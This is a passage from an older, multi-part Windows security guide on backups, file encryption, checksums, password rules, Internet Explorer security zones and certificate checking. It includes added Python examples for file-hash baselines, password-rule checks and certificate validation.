Windows NT, 2000 and XP come with many built-in users and groups. These include Administrator, Backup Operator, Guest, Power User and many more. The purpose of these groups is to extend the abilities of a user without having to make that user an Administrator. However, because of the powers granted to these groups, any user who is a member of one can become an Administrator. All unnecessary users must be disabled.



To disable unwanted accounts, go to Start menu\Settings\Control Panel\Administrative Tools\Computer Management\Local Users and Groups\Users. Double-click the account the user wants to disable and check the “Account is disabled” box (see Figure-15).







    Figure-16: Account is disabled



    Continued...................




    Defensive Measures at Data Layer



    This is the fourth and core layer of the defense in depth model. The defensive measures that have to be taken at this layer are:



• User must back up his important files



• Use encryption to ensure confidentiality of sensitive data



• File Checksum



• Password Policy



• Login Settings



• Audit Policy Settings



• Event Viewer





User must back up his important files



Taking backups of important files is one of the most important safety measures. It is like carrying a spare tyre in the car: imagine that one of the car’s tyres punctures and, when the driver is about to change it, he discovers that he has no spare with him. What happens, likewise, if the computer system malfunctions or is destroyed by a successful attacker?



Backing up data is a task the user should perform regardless of whether his system is secured or not. As far as security is concerned, this is the last line of defense. If someone gains access to the system and deletes files, the user will need to restore them from backup.



Confused about which files to back up and which not? Here is a way to distinguish between the two. Generally, files fall into two broad categories:



• Files which can be replaced, such as basic operating system or application files.



• Files which can’t be replaced, such as family pictures, letters, invoices and account records.



Although it is best practice to back up the whole system, the constraint is the space available on the backup media. The user can back up data to an external or removable hard drive, a personal tape drive, a Zip or Jaz drive, a CD-burner or DVD-burner, or at bare minimum to floppy disks. If the user has a CD-writer (a full backup may take more than one CD) or a DVD-writer, he can conveniently take a full backup of his system. If he has neither, he has to decide beforehand which files to back up and choose the backup media according to the space required.





Every operating system provides a feature for taking backups to different media. Apart from that, separate applications are also available which can take backups, such as the software that comes with a CD-writer or DVD-writer.



Windows comes with a built-in program called “Backup”. It is located at Start>Programs>Accessories>System Tools and is quite easy to operate: the user just selects the files to back up and the destination where they should be stored.



How and where should the user store the backup media after backing up data to them? They need to be stored in a safe place; remember that they contain files that are virtually irreplaceable if lost or damaged. If the user does not have a secure storage area, that must not stop him from doing regular backups: any backup is better than no backup!



How regular is regular depends on the comfort level of the user, i.e. how much work is he prepared to lose? A daily backup would be ideal, but a weekly backup might be more viable.





    Use encryption to ensure confidentiality of sensitive data





With the newer versions of Windows, i.e. Windows 2000 and XP, the user can use the Encrypting File System (EFS) to encrypt important data files. With such encryption, an intruder who gets through all the defense-in-depth layers and tries to access encrypted files or folders will be prevented from doing so. The intruder will receive an access denied message if he tries to open, copy, move, or rename an encrypted file or folder, unless he has obtained the user ID and password of either the system administrator or the user who created the encrypted file.



Once a file or folder is encrypted, the user can work with it just as he would with any other file or folder, since encryption is transparent to the user who encrypted it. This means that the user does not have to decrypt the file before using it.



A file or folder can be encrypted, subject to the following constraints, by selecting it in Explorer, opening its Properties page, clicking Advanced and ticking the “Encrypt contents to secure data” attribute:



• Only files and folders on NTFS file system volumes can be encrypted.



• Compressed files or folders cannot be encrypted.



• System files cannot be encrypted.



If the user ever loses the file encryption certificate and its associated private key (through disk failure or any other reason), the data can be recovered through the person designated as the recovery agent.



    Of course if the use of EFS is not an option, then a knowledgeable user could use PGP for this sort of encryption. However, using PGP would not be transparent like using EFS. PGP Freeware is available for non-commercial use.



Apart from these, if the user is not using EFS or PGP, he should at least use NTFS (NT File System), which gives file-level user security. Windows 9x does not support the NTFS file system; a user needs Windows NT or later to use NTFS.





    File checksum



File Checksum is a utility that computes MD5 or SHA-1 cryptographic hashes of files, so that the values can be compared against known good values to make sure the files have not been changed. It can also compute the hashes of all critical files and save the values in an XML file database; after a suspected compromise, the computer can be checked against that database to determine which files have been modified.



Users are advised to calculate the checksums of all system files and compare them regularly, as a defense against Trojans and backdoors.
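The baseline-and-compare workflow described above, as an added example written for this page (it is not the File Checksum utility the guide refers to, and does not reproduce that tool's XML layout): it hashes every file under a directory, stores the digests in an XML file, and on a later scan reports which files were modified, removed, or added. The directory, file names and contents used in `demo()` are constructed for the walkthrough.

```python
"""Baseline-and-compare file checksums, the way the guide describes.

Added example for this page; it is not the File Checksum utility the
guide refers to. The directory, file names and contents in demo() are
constructed for the walkthrough.
"""
import hashlib
import os
import shutil
import tempfile
import xml.etree.ElementTree as ET

# The guide names MD5 and SHA-1; SHA-256 is recorded as well (see note below).
DEFAULT_ALGOS = ("md5", "sha1", "sha256")


def hash_file(path, algo="sha1", chunk=65536):
    """Hex digest of one file, read in chunks so large files do not fill memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root, algos=DEFAULT_ALGOS):
    """Hash every file under root; keys are forward-slash paths relative to root."""
    db = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            db[rel] = {a: hash_file(full, a) for a in algos}
    return db


def save_baseline(db, xml_path):
    """Write the baseline as <baseline><file path=..><hash algo=..>hex</hash>.."""
    root = ET.Element("baseline")
    for rel, digests in sorted(db.items()):
        node = ET.SubElement(root, "file", path=rel)
        for algo, hexdigest in sorted(digests.items()):
            ET.SubElement(node, "hash", algo=algo).text = hexdigest
    ET.ElementTree(root).write(xml_path, encoding="utf-8", xml_declaration=True)


def load_baseline(xml_path):
    """Read a baseline written by save_baseline back into a dict."""
    db = {}
    for node in ET.parse(xml_path).getroot().findall("file"):
        db[node.get("path")] = {h.get("algo"): h.text for h in node.findall("hash")}
    return db


def compare(baseline, current):
    """Files whose digests changed, that vanished, or that appeared since the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


def demo():
    """Constructed walkthrough: take a baseline, change the tree, re-scan and compare."""
    work = tempfile.mkdtemp()
    try:
        tree = os.path.join(work, "system")
        os.makedirs(tree)
        with open(os.path.join(tree, "kernel.dll"), "wb") as f:
            f.write(b"abc")
        with open(os.path.join(tree, "hosts"), "wb") as f:
            f.write(b"127.0.0.1 localhost\n")
        xml_path = os.path.join(work, "baseline.xml")
        save_baseline(build_baseline(tree), xml_path)
        known_sha1 = hash_file(os.path.join(tree, "kernel.dll"), "sha1")
        # Simulated changes: one file edited, one removed, one new file dropped in.
        with open(os.path.join(tree, "hosts"), "ab") as f:
            f.write(b"# edited\n")
        os.remove(os.path.join(tree, "kernel.dll"))
        with open(os.path.join(tree, "extra.exe"), "wb") as f:
            f.write(b"new file")
        return known_sha1, compare(load_baseline(xml_path), build_baseline(tree))
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    print(demo())
```

SHA-256 is stored alongside the two algorithms the guide names because MD5 and SHA-1 are no longer considered collision-resistant; recording all three costs little and keeps the baseline useful. Two practical points follow from the design: the baseline must be taken from a system known to be clean, and the XML file should be kept on read-only or offline media, since a baseline that an intruder can rewrite proves nothing.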





    Password Policies





    Importance of a password





• A password represents the identity of an individual to a system.



• It helps individuals protect personal information from being viewed by unauthorized users. Hence it is important to secure passwords.



• Passwords act as a barrier between the user and his personal information.





    BASIC THINGS TO REMEMBER WHILE SETTING A PASSWORD





• Use at least 8 characters to create a password. The more characters used, the more secure the password.



• Use various combinations of characters while creating a password. For example, create a password consisting of a combination of lower case, upper case, numbers and special characters.



• Avoid using words from the dictionary. They can be cracked easily.



• Create a password that can be remembered. This avoids the need to write passwords down, which is not advisable.



• A password must be difficult to guess.





    Countermeasures for Choosing a Good Password and Safeguarding Passwords



• Do not use a password that represents your personal information, such as nicknames, phone numbers or date of birth.



• Change the password once a month, or whenever you suspect someone knows it.



• Do not use a password that was used earlier.



• Be careful while entering a password when someone is sitting beside you.



• Never write a password on paper to store it. The brain is the best place to store it.



• Do not reveal your password to anyone, not even to the system administrator.



• Store passwords on a computer only with the help of an encryption utility.



• Do not use the names of things located around you as passwords for your account.
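The countermeasures listed under “Password Policy” earlier in this post, and the shorter “Basic things to remember” list in this section, can be turned into a mechanical check. The following is an added example written for this page, not a tool from the guide or from Windows: it reports which of the listed rules a candidate password breaks. The wordlist is a constructed stand-in for a real dictionary; the thresholds (a run of three ascending or descending characters, four adjacent keyboard keys, a four-character overlap with an old password) and the table of digit-for-letter substitutions are assumptions, not the guide's. Run on the guide's own samples, it rejects `administrator123` on five counts and passes a constructed phrase-derived password; it also flags the guide's “good” sample `IJ!5iS@g0odP4s5wD` under the “don't use numbers in place of similar letters” rule, because undoing 0→o, 4→a and 5→s reveals the words “good” and “pass”.

```python
"""Checker for the password countermeasures listed in the guide.

Added example for this page, not a tool from the guide or from Windows.
The wordlist is a constructed stand-in for a real dictionary, and the
thresholds (three-character runs, four-character keyboard pieces, four-
character overlap with an old password) are assumptions, not the guide's.
"""
import string

# Constructed toy dictionary; load a real wordlist for actual use.
DICTIONARY = {
    "password", "pass", "word", "admin", "administrator", "welcome",
    "letmein", "monkey", "dragon", "secret", "login", "good", "user",
}

# Digits and symbols commonly used in place of look-alike letters (assumption).
LEET_MAP = str.maketrans({
    "0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t",
    "@": "a", "$": "s", "!": "i",
})

KEYBOARD_ROWS = ("qwertyuiop", "asdfghjkl", "zxcvbnm")


def _dictionary_hits(text, min_len=4):
    """Dictionary words of at least min_len letters found anywhere in text."""
    low = text.lower()
    return {w for w in DICTIONARY if len(w) >= min_len and w in low}


def _has_sequence(pw, run=3):
    """True if pw contains `run` letters or digits in ascending or descending order."""
    for i in range(len(pw) - run + 1):
        chunk = pw[i:i + run]
        if not chunk.isalnum():
            continue
        steps = {ord(b) - ord(a) for a, b in zip(chunk, chunk[1:])}
        if steps == {1} or steps == {-1}:
            return True
    return False


def _has_keyboard_run(pw, run=4):
    """True if pw contains `run` adjacent keys from one keyboard row, in either direction."""
    low = pw.lower()
    for row in KEYBOARD_ROWS:
        for i in range(len(row) - run + 1):
            piece = row[i:i + run]
            if piece in low or piece[::-1] in low:
                return True
    return False


def check_password(pw, logon_name="", old_passwords=(), min_length=7):
    """Return the names of the rules `pw` violates; an empty list means it passes."""
    failed = []
    low = pw.lower()
    symbols = set(string.punctuation)
    if len(pw) < min_length:
        failed.append("length")
    if not (any(c.isupper() for c in pw) and any(c.islower() for c in pw)
            and any(c.isdigit() for c in pw) and any(c in symbols for c in pw)):
        failed.append("classes")
    # "Second through sixth position" is index 1..5.
    if not any(c in symbols for c in pw[1:6]):
        failed.append("symbol_position")
    if len(set(pw)) < 4:
        failed.append("distinct")
    name = logon_name.lower()
    if any(name[i:i + 3] in low for i in range(len(name) - 2)):
        failed.append("logon_name")
    plain_hits = _dictionary_hits(pw)
    if plain_hits:
        failed.append("dictionary")
    # A word that only shows up once substitutions are undone is a disguised word.
    if _dictionary_hits(pw.translate(LEET_MAP)) - plain_hits:
        failed.append("leet")
    if any(low[i:i + 4] in old.lower()
           for old in old_passwords for i in range(len(low) - 3)):
        failed.append("reuse")
    if _has_sequence(pw):
        failed.append("sequence")
    if _has_keyboard_run(pw):
        failed.append("keyboard")
    return failed


if __name__ == "__main__":
    # The guide's two samples, plus a constructed phrase-derived password
    # ("I bought 2 cats & 3 dogs in May!" -> first character of each word).
    for candidate in ("IJ!5iS@g0odP4s5wD", "administrator123", "Ib2c&3diM!"):
        print(candidate, "->", check_password(candidate, logon_name="administrator") or "OK")
```

`min_length` defaults to the seven characters of the first list; pass `min_length=8` to apply the eight-character minimum from the list in this section. The phrase-derived sample shows the guide's suggested method in practice: the first characters of a memorable sentence give a password that breaks none of the rules, while still being something the user can reconstruct without writing it down.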



    Continued.....................


    Security Zones



IE uses a capabilities/trust model called security zones. In this model, Web sites are permitted to perform certain actions depending on which of the following zones they fall into:



• Restricted sites zone: contains web sites that could potentially damage the user’s data.



• Trusted sites zone: contains web sites that the user trusts not to damage his computer or data.



• Local intranet zone: contains all web sites on the organization’s intranet.



• Internet zone: contains all web sites that the user hasn’t placed in another zone.







    Figure-12: Security zones in Internet Explorer



Each zone has an assigned security level (High, Medium, Medium-Low, or Low). Users can modify the security level of each zone, but IE will warn them if they attempt to assign a zone a security level lower than the recommended minimum.





    Disable ActiveX and Java Scripts



Malicious web scripts reach the browser when a web site sends such damaging code as part of the web server’s response. This code is then executed on the host running the browser.



The drawback of disabling these features is that certain sites can no longer be browsed effectively, which the user may find frustrating. If the user cannot do without these scripts, an alternative is a commercial anti-virus scanner that affords some level of protection against malicious scripts.



Choose the following options for safety:



• Open Internet Explorer.



• On the menu select Tools → Internet Options.



• Click on the Security tab.



• With the Internet zone highlighted, click the Custom Level button.



• Make the following modifications to the Internet zone:



• Under ActiveX controls and plug-ins, set Script ActiveX controls marked safe for scripting to Disable



• Under Scripting, set Active scripting to Disable (This will disable all scripting, including ActiveX. If this impacts required functionality, change the setting to Prompt)



• Under Scripting, set Scripting of Java applets to Disable



By default the Trusted sites zone is assigned the Low security level, since this zone is intended for highly trusted sites, such as the sites of trusted business partners. The user can also customize its settings by clicking the Custom Level button.



To add sites to this zone:



• Click on the Trusted sites icon



• Click on the Sites button to add the trusted web site’s name



• Select “Require server verification (https:) for all sites in this zone”. This ensures that only sites reached over an encrypted HTTPS connection are treated as trusted.



• By default, the Restricted sites zone is assigned the High security level. Assign sites to this zone as described above.



• Click on OK to return to the Internet Options box, and then click OK.





    Other Security Settings in IE



    IE contains many other security-related settings. Guidance on implementing a few of particular interest is as follows:



    • Open Internet Explorer



• On the menu select Tools → Internet Options



    • Click on the Advanced tab



    • Under Security, check the box for Check for server certificate revocation. This causes IE to verify that a Web site’s digital certificate has not been revoked before accepting it as legitimate and current



    • Under Security, check the box for Empty Temporary Internet Files folder when browser is closed. This causes IE to delete temporary files after the browser session is finished; these files could inadvertently contain sensitive information.







    Figure-13: Other Security Settings for IE



    • Click on the Privacy tab, and then click the Advanced button



    • Check the Override automatic cookie handling box. This allows different settings to be made for handling first-party and third-party cookies



    • Change the Third-party Cookies setting from Accept to Prompt.



    This setting causes IE to prompt the user to accept each third-party cookie that is presented to the system.



    For more information on Internet Explorer look at the home page of IE at



    http://www.microsoft.com/windows/ie/default.mspx





    Secure Site Identification



When buying online, the user must make sure he is doing business with a secure Web site. Unscrupulous "hackers" can exploit insecure sites to steal the user’s personal and important information, such as a credit card number. This information could then be used to steal the user’s identity.



Most e-commerce Web sites protect users’ personal information by encrypting (scrambling) the data. Netscape and Internet Explorer users can check a Web site’s security by following these instructions:



    1. Look for the Lock symbol



Check the status bar at the bottom of the Web browser window for an unbroken lock symbol. This means the user’s personal information is scrambled in transit, and no one can read it but the e-business he has contacted.



    2. Look for "https" in the Web Site's Address



The address of a secure site changes from "http" to "https" when the information is about to pass through a secure channel. The "s" stands for "secure" and indicates that the information will travel the Internet in encrypted form.



Since the user’s data is encrypted (scrambled), it can't be read during transmission. For example, on www.hotmail.com, when the user enters the login and password information, the address bar changes from “http” to “https” and the browser shows the following message before forwarding the information (see Figure-13).







Figure-14: Message for secure connection





Users generally ignore this warning message, or tick the option not to show it in future, which is bad practice. Whenever such a security confirmation appears, the user should verify the server’s digital certificate.





    Check the Certificate



Double-click on the lock symbol to view the security certificate. Make sure the certificate is "Issued to" the Web site and that the "Valid from" dates are current. The user can also view the certificate from File → Properties and then choosing Certificates.







    Figure-15: Checking the validity of a certificate



The certificate should be checked for its issuer, the site it has been issued to, and its validity period (as shown in Figure-14 above).
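The three checks just listed (who the certificate was issued to, who issued it, and whether its dates are current), as an added example written for this page rather than code from the guide. It works on the dictionary that Python's `ssl.SSLSocket.getpeercert()` returns, and `SAMPLE_CERT` is a constructed certificate for the placeholder site `www.example.com`, not any real site's certificate. `fetch_peer_cert` is a hypothetical helper name that uses only the standard library to obtain a live site's certificate in the same layout.

```python
"""Check a server certificate the way the guide tells the user to:
who it is issued to, who issued it, and whether its dates are current.

Added example for this page, not code from the guide. It works on the
dictionary that ssl.SSLSocket.getpeercert() returns; SAMPLE_CERT is a
constructed certificate for the placeholder site www.example.com.
"""
import socket
import ssl

# Constructed sample in getpeercert() layout (only the fields this check uses).
SAMPLE_CERT = {
    "subject": ((("countryName", "US"),), (("commonName", "www.example.com"),)),
    "issuer": ((("organizationName", "Example CA"),), (("commonName", "Example CA Root"),)),
    "notBefore": "Jan  1 00:00:00 2010 GMT",
    "notAfter": "Dec 31 23:59:59 2011 GMT",
    "subjectAltName": (("DNS", "www.example.com"), ("DNS", "*.example.com")),
}


def to_epoch(cert_time):
    """Seconds since the epoch for a certificate date string such as 'Jan  1 00:00:00 2010 GMT'."""
    return ssl.cert_time_to_seconds(cert_time)


def _field(rdn_seq, key):
    """First value of `key` in a subject/issuer sequence of relative distinguished names."""
    for rdn in rdn_seq:
        for k, v in rdn:
            if k == key:
                return v
    return None


def _name_matches(pattern, host):
    """Exact match, or a wildcard that covers exactly one leftmost label."""
    pattern, host = pattern.lower(), host.lower()
    if pattern == host:
        return True
    if pattern.startswith("*."):
        labels = host.split(".")
        return len(labels) > 1 and ".".join(labels[1:]) == pattern[2:]
    return False


def describe(cert):
    """The items the guide says to read off the certificate dialog."""
    return {
        "issued_to": _field(cert["subject"], "commonName"),
        "issued_by": _field(cert["issuer"], "commonName"),
        "valid_from": cert["notBefore"],
        "valid_to": cert["notAfter"],
    }


def check_certificate(cert, hostname, now):
    """Return a list of problems; an empty list means the certificate passes these checks."""
    problems = []
    names = [v for k, v in cert.get("subjectAltName", ()) if k == "DNS"]
    if not names:  # fall back to the subject CN only when there is no SAN
        cn = _field(cert["subject"], "commonName")
        names = [cn] if cn else []
    if not any(_name_matches(n, hostname) for n in names):
        problems.append("hostname mismatch")
    if now < to_epoch(cert["notBefore"]):
        problems.append("not yet valid")
    if now > to_epoch(cert["notAfter"]):
        problems.append("expired")
    if not _field(cert["issuer"], "commonName"):
        problems.append("issuer missing")
    return problems


def fetch_peer_cert(host, port=443, timeout=5):
    """Hypothetical helper: connect with the default (validating) context and
    return the peer certificate in the same layout as SAMPLE_CERT."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    print(describe(SAMPLE_CERT))
    print(check_certificate(SAMPLE_CERT, "www.example.com", to_epoch("Jun 15 12:00:00 2010 GMT")))
```

The manual checks mirror what the user does by eye in the certificate dialog; a default `ssl.create_default_context()` already performs chain and hostname validation before `fetch_peer_cert` returns, so the explicit checks above matter most when a browser has shown a warning that the user is tempted to click through.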



    Continued..................